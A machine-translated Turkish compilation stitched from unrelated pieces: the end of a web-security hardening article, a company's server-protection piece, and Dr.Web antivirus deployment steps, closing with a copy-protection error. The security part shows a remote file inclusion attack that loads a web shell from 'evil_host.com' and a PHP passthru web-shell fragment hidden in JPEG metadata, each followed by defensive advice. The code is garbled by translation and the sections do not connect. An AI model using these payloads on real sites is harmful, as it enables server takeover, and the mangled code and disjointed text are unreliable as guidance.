    • Görünümler ve saklı yordamlar gibi SQL Server özelliklerinden kapsamlı şekilde yararlanın. Bu, veritabanına yetkisiz erişimi sınırlayacaktır.
    • İsteğe bir parametre iletmeden önce, tür için (PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() ve is_integer()) ve en azından kontrol edilmelidir. , PHP için addlashes tipi yapısı kullanılarak alıntılanmıştır.
    • Tüm komut dosyaları, bazı veritabanı hesaplarından veritabanıyla çalışır, bu hesaptan iş için gerekli olmayan tüm ayrıcalıkları kaldırın. Bilgisayar korsanları genellikle MySQL komutunu (MySQL örnek alınmıştır, bu herhangi bir SQL sunucusu için geçerlidir) "LOAD DATA INFILE" komutunu sunucudan ve MySQL'in çalıştığı okunabilir hesaptan ihtiyaç duydukları dosyaları okumak için kullanırlar. Sonuç olarak, LOAD DATA INFILE komutunu kullanmak için gerekli olan DOSYA gibi komut dosyalarınız için gereksiz ayrıcalıkları devre dışı bırakın. "Temel minimum" ilkesi esas alınmalıdır.
    • SQL sunucusunun altında çalıştığı sistem hesabının sitenin sayfalarına ve sunucunun sistem dosyalarına erişimi olmamalıdır.
  • Dosyaları bağlama. Dosyayı dahil et. Diyelim ki bir site.com/getnews.php?file=190607 sayfası var, ancak komut dosyasının yazarı, include kullanarak sayfayı kontrol etmeden bağlar.

    $dosya = $_REQUEST["dosya"];
    dahil($dosya.".html");

    Bilgisayar korsanı, 190607 yerine kötü_host.com/shell.php ile değiştirecek ve ardından bilgisayar korsanı tarayıcısının tüm adres çubuğu bu site.com/postnews.php?file=evil_host.com/shell.php ve bilgisayar korsanı gibi görünecektir. Apache'nin sahip olduğu haklara sahip sitenizde kendi web kabuğuna sahip olacaktır.

    Dosya bağlantı koruması:

    • Komut dosyalarınızda, kullanıcının girdiği ve adres çubuğu aracılığıyla komut dosyasına ilettiği tüm parametreleri kontrol edin ve filtreleyin. Programlama diliniz için size nasıl güvenli bir şekilde kod yazacağınızı öğreten materyal bulun.
    • Sitedeki programlama dilinin sistem komutlarını çalıştırmanıza izin vermesi, bilgisayar korsanlarının gerçekten hoşuna gidiyor. Bu nedenle, elbette bu mümkünse, programlama dilinizde bu tür işlevlerin çağrılmasını yasaklamalısınız. Örneğin, PHP ayarlarında php.ini'deki disable_functions işlevini kullanarak "yasak" işlevlerin bir listesini belirtmek mümkündür.
  • Truva resmi
    Sitedeki sunucuya dosya yükleme olanağınız varsa, örneğin avatar resimleri yüklemeye hazır olun. JPEG formatındaki bir resimde metadata kavramı vardır (bir kare çekerken kameranın bilgiyi nereye yazdığını unutmayın) ve bu metadata yazılacaktır.

    ";passthru($_GET["cmd"]);echo ""; ?>

    uzantı denetimlerinin çoğunu atlamak için resim avatara.jpg.php olarak yeniden adlandırılacak ve site.com/upload_images/avatara.jpg.php?cmd=server_commands adresini kullanacak

    Truva koruması:

    • Dosya uzantısını doğru kontrol edin. İzin verilen dosyaları doğru şekilde işleseniz bile, sitenizdeki başka bir güvenlik açığı kullanılarak jpg'den php'ye görüntünün yeniden adlandırılmasına hazır olun. PHP'de exif_read_data() gibi işlevlere sahip bir görüntüdeki meta verileri kontrol edin.
    • Web sunucunuz aracılığıyla görüntü dizinlerinde programlama dillerinin yürütülmesini engelleyin. Bunu yapmak için, programlama dillerini dosya uzantılarıyla ilişkilendiren ve bunların resimlerle dizinlerde yürütülmesini yasaklayan "AddType application/x-httpd-" gibi Apache yapılandırma satırlarına bakın. Apache için PHP dil dosyalarının yürütülmesini yasaklamak bir yapı olacaktır.


      Siparişi reddet, izin ver
      hepsinden reddet

    • Programlama diliniz için, görüntüleri işlerken ve bunları sunucuya doğru şekilde yüklerken nasıl güvenli kod yazacağınızı öğreten materyalleri bulun.

Kişisel teşekkürler:

  • eleştiri ve tavsiye için arkadaş Alexander Pupyshev aka vaşak
  • site antichat.ru/
  • www.xakep.ru/
  • Michael Eben, Brian Taiman'ın kitabı. FreeBSD Yönetimi: Dengeleme Sanatı
  • Joel Scambray, Stuart McClure, George Kurtz'un kitabı. Bilgisayar korsanlarının sırları: Ağ güvenliği - hazır çözümler. İkinci baskı

Diğer koruma bilgileri kaynakları:

  • FreeBSD adam güvenlik kılavuzu sayfası, yaygın güvenlik sorunlarının ve iyi yönetim uygulamalarının bir açıklamasını içerir.
  • freebsd-security @ freebsd.org posta listelerine abone olun. Bunu yapmak için, mesajın gövdesinde freebsd-security aboneliği ile majordomo @ freebsd.org adresine bir e-posta gönderin. En acil güvenlik konularının tartışıldığı yer bu e-posta listesindedir.
  • FreeBSD güvenlik bilgileri sayfası freebsd.org/security/
  • FreeBSD Güvenlik Nasıl Yapılır Belgesi
  • CERT.org web sitesi, tüm işletim sistemlerinin korunmasındaki güvenlik açıkları hakkında bilgi içerir.
  • Güvenlik Duvarları ve İnternet Güvenliği, William R. Cheswick ve Steven M. Bellowin
  • İnternet Güvenlik Duvarları Oluşturma, 2. Baskı, Brent Chapman ve Elizabeth Zwicky

Sonuç:
Umarım makale tüm sorunları bir arada görmenize yardımcı olmuştur, şimdi yöneticinin bilgisayar güvenliği, veritabanları, web sunucuları, programlama dilleri hakkında ek kaynaklardan okuması gerekiyor. Makaleyi kısaca özetlemek gerekirse, güvenlik sorunlarının ortaya çıkmasıyla ilgili haberlerden haberdar olmanız, geliştirmelerinizde tüm giriş verilerini güncellemeniz ve doğruluğunu kontrol etmeniz gerekir.
Güç seninle olsun!

Sunucuyu harici erişimden tamamen korumak imkansızdır, çünkü her gün yeni güvenlik açıkları keşfedilmekte ve sunucuyu hacklemenin yeni yolları ortaya çıkmaktadır. Bu yazımızda sunucuların yetkisiz erişime karşı korunmasından bahsedeceğiz.

Herhangi bir şirketin sunucuları, er ya da geç, bilgisayar korsanlığı veya virüs saldırısı için hedef haline gelebilir. Tipik olarak, böyle bir saldırının sonucu veri kaybı, itibar veya mali zarardır, bu nedenle sunucu güvenlik sorunları ilk etapta ele alınmalıdır.

Sunucu korsanlığına karşı korumanın, sunucu çalışmasının sürekli izlenmesini içeren ve korumayı iyileştirmeye yönelik olanlar da dahil olmak üzere bir dizi önlem olduğu anlaşılmalıdır. Sunucuyu harici erişimden tamamen korumak imkansızdır, çünkü her gün yeni güvenlik açıkları keşfedilmekte ve sunucuyu hacklemenin yeni yolları ortaya çıkmaktadır.

Bu yazımızda sunucuların yetkisiz erişime karşı korunmasından bahsedeceğiz.

Sunucuları yetkisiz erişimden korumanın yolları ve yöntemleri

Sunucu fiziksel koruması

Fiziksel koruma. Sunucunun güvenli bir veri merkezinde, kapalı ve korunaklı bir odada bulunması, dışarıdan kimsenin sunucuya erişimi olmaması arzu edilir.

SSH kimlik doğrulamasını ayarlayın

Sunucuya erişimi ayarlarken, parola yerine SSH anahtar kimlik doğrulamasını kullanın, çünkü bu tür anahtarlar çok daha zor ve bazen kaba kuvvet araması kullanarak kırmak imkansızdır.

Hala bir parolaya ihtiyacınız olduğunu düşünüyorsanız, parola girme denemelerinin sayısını sınırladığınızdan emin olun.

Giriş yaptığınızda şöyle bir mesaj görürseniz dikkat edin:

Son başarısız oturum açma: 28 Eylül Salı 12:42:35 MSK 2017, 52.15.194.10'dan ssh:notty'de
Son başarılı oturum açma işleminden bu yana 8243 başarısız oturum açma girişimi oldu.

Sunucunuzun saldırıya uğradığını gösterebilir. Bu durumda, sunucu güvenliğini yapılandırmak için SSH bağlantı noktasını değiştirin, sunucuya erişimin mümkün olduğu IP'lerin listesini sınırlandırın veya aşırı sık ve şüpheli etkinlikleri otomatik olarak engelleyen bir yazılım yükleyin.

En son güncellemeleri düzenli olarak yükleyin

Sunucu korumasını sağlamak için kullandığınız sunucu yazılımının (işletim sistemi, hiper yönetici, veritabanı sunucusu) en son yamalarını ve güncellemelerini zamanında yükleyin.

Sıfırıncı gün güvenlik açıklarından yararlanan saldırıları önlemek için her gün yeni yamalar, güncellemeler ve bildirilen hataları/güvenlik açıklarını kontrol etmeniz önerilir. Bunu yapmak için yazılım geliştirme şirketinden haberlere abone olun, sayfalarını sosyal ağlarda takip edin.

Şifreleri koruyun

Bir sunucuya erişmenin en yaygın yollarından biri, sunucunun parolasını kırmaktır. Bu nedenle, sunucuyu korumasız bırakmamak için iyi bilinen ancak yine de ilgili önerileri izleyin:

  • şirket adı gibi tahmin edilmesi kolay şifreler kullanmayın;
  • yönetici konsolu için hala varsayılan parolayı kullanıyorsanız, hemen değiştirin;
  • farklı hizmetler için parolalar farklı olmalıdır;
  • şifrenizi birisiyle paylaşmanız gerekiyorsa, IP adresinizi, kullanıcı adınızı ve şifrenizi asla aynı e-posta veya mesajlaşma mesajında ​​göndermeyin;
  • Yönetici hesabına giriş yapmak için 2 Adımlı Doğrulamayı ayarlayabilirsiniz.

güvenlik duvarı

  • Sunucunun sahip olduğundan, yapılandırıldığından ve her zaman çalıştığından emin olun.
  • Hem gelen hem de giden trafiği koruyun.
  • Hangi bağlantı noktalarının açık olduğunu ve hangi amaçlarla açık olduğunu takip edin, sunucu korsanlığına yönelik olası güvenlik açıklarının sayısını azaltmak için fazladan hiçbir şey açmayın.

Özellikle güvenlik duvarı, sunucuyu ddos ​​​​saldırılarından korumada çok yardımcı olur, çünkü hızlı bir şekilde engelleyici güvenlik duvarı kuralları oluşturabilir ve saldırının geldiği IP adreslerini ekleyebilir veya belirli protokolleri kullanarak belirli uygulamalara erişimi engelleyebilirsiniz.

İzleme ve izinsiz giriş algılama

  • Sunucunuzda çalışan yazılım ve hizmetleri sınırlayın. Çalıştırdığınız her şeyi periyodik olarak kontrol edin ve herhangi bir yabancı işlem bulunursa, hemen silin ve virüs kontrolüne başlayın.
  • Periyodik olarak kurcalama belirtileri olup olmadığını kontrol edin. Bilgisayar korsanlığı, bir dosyayı oluşturmadığınız, taşımadığınız veya silmediğiniz yeni kullanıcı hesaplarıyla kanıtlanabilir. /etc/syslog.conf, silinen dosyalar /etc/gölge ve /etc/passwrd .
  • Sunucunuzu izleyin, normal hızına ve verimine dikkat edin, böylece örneğin sunucudaki yük normalden çok daha fazla olduğunda sapmaları fark edebilirsiniz.

VPN ve SSL/TLS Şifrelemeyi Kullanma

Sunucuya uzaktan erişim gerekiyorsa, yalnızca belirli IP adreslerinden izin verilmeli ve VPN üzerinden gerçekleşmelidir.

Güvenliği sağlamanın bir sonraki adımı, yalnızca verileri şifrelemekle kalmayacak, aynı zamanda ağ altyapısındaki diğer katılımcılara uygun sertifikalar vererek kimliklerini de doğrulayacak olan SSL'yi kurmak olabilir.

Sunucu güvenlik kontrolü

Pentest yöntemini kullanarak sunucunun güvenliğini bağımsız olarak kontrol etmek iyi bir fikir olacaktır, yani. potansiyel güvenlik açıklarını bulmak ve bunları zamanında ortadan kaldırmak için saldırı simülasyonu. Buna bilgi güvenliği uzmanlarının dahil edilmesi arzu edilir, ancak bazı testler sunucu korsanlığı programları kullanılarak bağımsız olarak yapılabilir.

Sunucuları bilgisayar korsanlığı dışında tehdit eden başka neler var?

Bir sunucu, saldırıya uğramak dışında çeşitli nedenlerle çökebilir. Örneğin, kötü amaçlı yazılım bulaşması veya bileşenlerden birinin yalnızca fiziksel hatası olabilir.

Bu nedenle, sunucuyu korumaya yönelik önlemler şunları içermelidir:

  • Sunucuyu korumak için programların yüklenmesi ve güncellenmesi - antivirüsler.
  • Haftada en az bir kez düzenli olarak şifrelenmiş veri kopyaları, çünkü istatistiklere göre, sunucu sabit diskleri arıza sıklığı açısından ilk sırada yer alıyor. Yedeklemenin fiziksel olarak güvenli bir ortamda saklandığından emin olun.
  • Sunucu odasına kesintisiz güç beslemesinin sağlanması.
  • Sunucuların tozdan temizlenmesi ve termal macunun değiştirilmesi dahil olmak üzere zamanında fiziksel olarak önlenmesi.

Integrus uzmanlarının deneyimi, bu tür tehditlere karşı en iyi korumanın sunucu koruma sistemleri alanındaki en iyi uygulamaların uygulanması olduğunu söyler.

Müşterilerimizin sunucularının güvenliğini sağlamak için bir dizi araç kullanıyoruz: güvenlik duvarları, antivirüsler, güvenlik/olay yönetimi teknolojileri (SIM/SEM), saldırı tespit/koruma teknolojileri (IDS/IPS), ağ davranış analizi (NBA) teknolojileri , elbette düzenli koruyucu bakım sunucuları ve anahtar teslimi olarak güvenli sunucu odalarının düzenlenmesi. Bu, başka nedenlerle bilgisayar korsanlığı veya sunucu hatası risklerini en aza indirmenize olanak tanır.

Şirketinizin sunucularının güvenlik denetimini yapmaya, uzmanlara danışmaya, sunucu ekipmanının korunmasıyla ilgili her türlü çalışmayı gerçekleştirmeye hazırız.

Bir virüsten koruma ağı dağıtmak için kısa talimatlar:

1. Tüm korunan bilgisayarlar ve mobil cihazlar dahil olmak üzere anti-virüs ağının yapısı için bir plan yapın.

Dr.Web Server işlevlerini gerçekleştirecek bir bilgisayar seçin. Anti-virüs ağı birkaç Dr.Web Sunucusu içerebilir. Bu konfigürasyonun özellikleri şurada açıklanmıştır:Yönetici Kılavuzu, P. Birkaç Dr.Web Sunuculu bir ağın özellikleri.

Dr.Web Server, yalnızca LAN sunucusu işlevi gören bir bilgisayara değil, herhangi bir bilgisayara kurulabilir. Bu bilgisayar için temel gereksinimler s'de verilmiştir.Sistem gereksinimleri.

Dr.Web Agent'ın aynı sürümü, LAN sunucuları dahil tüm korunan istasyonlara yüklenir. Aradaki fark, Sunucudaki ayarlar tarafından belirlenen yüklü anti-virüs bileşenleri listesindedir.

Dr.Web Server ve Dr.Web Agent'ı kurmak için ilgili bilgisayarlara bir kerelik erişim (fiziksel veya uzaktan kontrol ve program başlatma araçlarını kullanarak) gereklidir. Diğer tüm eylemler, anti-virüs ağ yöneticisinin iş yerinden (muhtemelen yerel ağın dışından dahil) gerçekleştirilir ve Dr.Web Sunucularına veya iş istasyonlarına erişim gerektirmez.

2. Plana göre, ilgili ağ düğümlerinde hangi işletim sistemleri için hangi ürünlerin kurulması gerektiğini belirleyin. Sağlanan ürünler hakkında ayrıntılı bilgi için bkz.Teslimat içeriği.

Gerekli tüm ürünler kutulu Dr.Web Enterprise Security Suite olarak satın alınabilir veya Doctor Web web sitesinden indirilebilir.https://download.drweb.ru/.

Android OS, Linux OS, OS X altındaki istasyonlar için Dr.Web Agent'lar ayrıca bağımsız ürünler için paketlerden kurulabilir ve ardından merkezi Dr.Web Sunucusuna bağlanabilir. Aracıların ilgili ayarlarının açıklaması şurada verilmiştir:Yükleme Rehberi, P. Kişisel bir yükleme paketi kullanarak Dr.Web Agent'ı yükleme.

3. Dr.Web Server'ın ana dağıtım kitini seçilen bilgisayar veya bilgisayarlara kurun. Kurulumun açıklaması şurada verilmiştir:Yükleme Rehberi, P. Dr.Web Sunucusunu Kurma.

Dr.Web Güvenlik Kontrol Merkezi, Sunucu ile birlikte kurulur.

Varsayılan olarak, Dr.Web Sunucusu kurulumdan sonra ve işletim sisteminin her yeniden başlatılmasından sonra otomatik olarak başlar.

4. Anti-virüs ağı Android OS, Linux OS, OS X altında korunan istasyonları içerecekse, ana Sunucu dağıtım paketinin kurulu olduğu tüm bilgisayarlara ek Dr.Web Sunucusu dağıtım paketini kurun.

5. Gerekirse, Proxy Sunucusunu kurun ve yapılandırın. Açıklama şurada verilmiştirYükleme Rehberi, P. Proxy Sunucusunu Ayarlama.

6. İstasyonlar üzerinde bulunan Sunucu ve anti-virüs yazılımını yapılandırmak için Sunucuya Dr.Web Güvenlik Kontrol Merkezini kullanarak bağlanmanız gerekmektedir.

Kontrol merkezi şu adreste mevcuttur:

http://<Адрес_Сервера> :9080

veya

https://<Адрес_Сервера> :9081

halbuki<Адрес_Сервера> Dr.Web Sunucusunun kurulu olduğu bilgisayarın IP adresini veya etki alanı adını belirtin.

Varsayılan yönetici adı yönetici.

Şifre:

Windows işletim sistemi için, Sunucu kurulumu sırasında belirtilen parola.

UNIX ailesinin işletim sistemi için - kök.

Sunucuya başarılı bir şekilde bağlanıldığında, Kontrol Merkezinin ana penceresi açılacaktır (ayrıntılı açıklama için, bkz.Yönetici Kılavuzu, s. Dr.Web Güvenlik Kontrol Merkezi).

7. Sunucunun ilk yapılandırmasını gerçekleştirin (Sunucu ayarlarının ayrıntılı açıklaması için, bkz.Yönetici Kılavuzu, içinde Bölüm 8: Dr.Web Sunucusunu Yapılandırma):

a. Bölümde Lisans yöneticisibir veya daha fazla lisans anahtarı ekleyin ve bunları uygun gruplara, özellikle gruba dağıtın Herkes . Sunucu kurulumu sırasında herhangi bir lisans anahtarı belirtilmemişse bu adım gereklidir.

b. Bölümde Genel depo yapılandırmasıanti-virüs ağının hangi bileşenlerinin Dr.Web GUS'tan güncelleneceğini belirtin. BölümdeDepo durumuSunucu deposundaki ürünleri güncelleyin. Güncelleme uzun sürebilir. Daha fazla yapılandırmaya geçmeden önce güncelleme işleminin tamamlanmasını bekleyin.

c. Sayfada Yönetim → Dr.Web SunucusuSunucu sürümü hakkında bilgi sağlar. Yeni bir sürüm mevcutsa, Sunucuyu bölümünde açıklandığı gibi güncelleyin.Yönetici Kılavuzu, P. Dr.Web Sunucusunu Güncelleme ve Yedekten Geri Yükleme.

d. Gerekirse ayarlayınAğ bağlantılarıanti-virüs ağının tüm bileşenleri arasındaki etkileşim için kullanılan varsayılan ağ ayarlarını değiştirmek için.

e. Gerekirse, Sunucu yöneticilerinin listesini yapılandırın. Yöneticilerin harici kimlik doğrulaması da mevcuttur. Ayrıntılar için bkz.Yönetici Kılavuzu, içinde Bölüm 5: Virüsten koruma ağının yöneticileri.

f. Anti-virüs yazılımının çalışmasına başlamadan önce, Sunucunun kritik veri yedekleme dizininin ayarını değiştirmeniz önerilir (bkz.Yönetici Kılavuzu, P. Dr.Web Sunucusu Zamanlama Ayarı). Sunucu yazılım dosyalarının ve yedek kopyanın aynı anda kaybolma olasılığını azaltmak için bu dizinin başka bir yerel sürücüye yerleştirilmesi arzu edilir.

8. İş istasyonları için anti-virüs yazılımının ayarlarını ve yapılandırmasını belirtin (grupları ve istasyonları yapılandırmanın ayrıntılı açıklaması için, bkz.Yönetici Kılavuzu, içinde Bölüm 6 ve Bölüm 7):

a. Gerekirse, istasyonlardan oluşan kullanıcı grupları oluşturun.

b. Grup ayarlarını yap Herkes ve oluşturulan kullanıcı grupları. Özellikle kurulabilir bileşenler bölümünü yapılandırın.

9. Dr.Web Agent yazılımını iş istasyonlarına yükleyin.

Bölümde Kurulum dosyalarıAracıyı yüklemek için sağlanan dosyaların listesini okuyun. İstasyonun işletim sistemine, uzaktan kurulum olasılığına, Agent'ı kurarken Sunucu ayarlarını belirleme seçeneğine vb. göre size uygun kurulum seçeneğini seçin. Örneğin:

Kullanıcılar virüsten koruma yazılımını kendileri kuruyorsa, Kontrol Merkezi aracılığıyla her istasyon için ayrı ayrı oluşturulan kişisel kurulum paketlerini kullanın. Bu tür paketler, kullanıcılara doğrudan Kontrol Merkezi'nden e-posta ile de gönderilebilir. Kurulumdan sonra istasyonlar otomatik olarak Sunucuya bağlanır.

Ağ üzerinden bir istasyona veya aynı anda birkaç istasyona uzaktan kurulum için (yalnızca Windows işletim sistemi altındaki istasyonlar için), ağ yükleyiciyi kullanın. Kurulum, bir tarayıcı uzantısı kullanılarak Kontrol Merkezi aracılığıyla gerçekleştirilir.

Active Directory hizmetini kullanarak aynı anda bir istasyona veya birkaç istasyona ağ üzerinden uzaktan kurulum yapmak da mümkündür. Bunu yapmak için, Active Directory'li ağlar için Dr.Web Enterprise Security Suite dağıtım paketiyle birlikte sağlanan, ancak Sunucu yükleyicisinden ayrı olarak sağlanan Dr.Web Agent yükleyicisini kullanın.

Kurulum sırasında Sunucu ve istasyonlar arasındaki iletişim kanalındaki yükü azaltmak gerekirse, Agent ve koruma bileşenlerini aynı anda yükleyen tam yükleyiciyi kullanabilirsiniz.

Android OS, Linux OS, OS X altındaki istasyonlara kurulum, genel kurallara göre lokal olarak yapılabilir. Ayrıca, önceden kurulmuş bağımsız bir ürün, uygun yapılandırmaya göre Sunucuya bağlanabilir.

10. Bilgisayarlara yüklendikten hemen sonra, Aracılar Sunucu ile otomatik olarak bağlantı kurar. Sunucudaki anti-virüs istasyonlarının yetkilendirilmesi, seçtiğiniz politikaya göre gerçekleşir (bkz.Yönetici Kılavuzu, P. İstasyon bağlantı politikası):

a. Kurulum paketlerinden kurulum yaparken ve ayrıca Sunucuda otomatik onay yapılandırılırken, iş istasyonları Sunucuya ilk kez bağlandıklarında otomatik olarak kaydedilir ve ek bir onay gerekmez.

b. Yükleyicilerden kurulum yaparken ve manuel erişim onayını yapılandırırken, yöneticinin yeni iş istasyonlarını Sunucuya kayıt olmaları için manuel olarak onaylaması gerekir. Bu durumda, yeni iş istasyonları otomatik olarak bağlanmaz, ancak Sunucu tarafından yeni başlayanlar grubuna yerleştirilir.

11. Sunucuya bağlanıp ayarları aldıktan sonra, istasyonun birincil grubunun ayarlarında belirtilen uygun anti-virüs paketi bileşenleri seti istasyona kurulur.

12. Kurulumdan sonra istasyonların ve anti-virüs yazılımının yapılandırılması da mümkündür (ayrıntılı açıklama için, bkz.Yönetici Kılavuzu, içinde Bölüm 7).

hata:İçerik korunmaktadır!!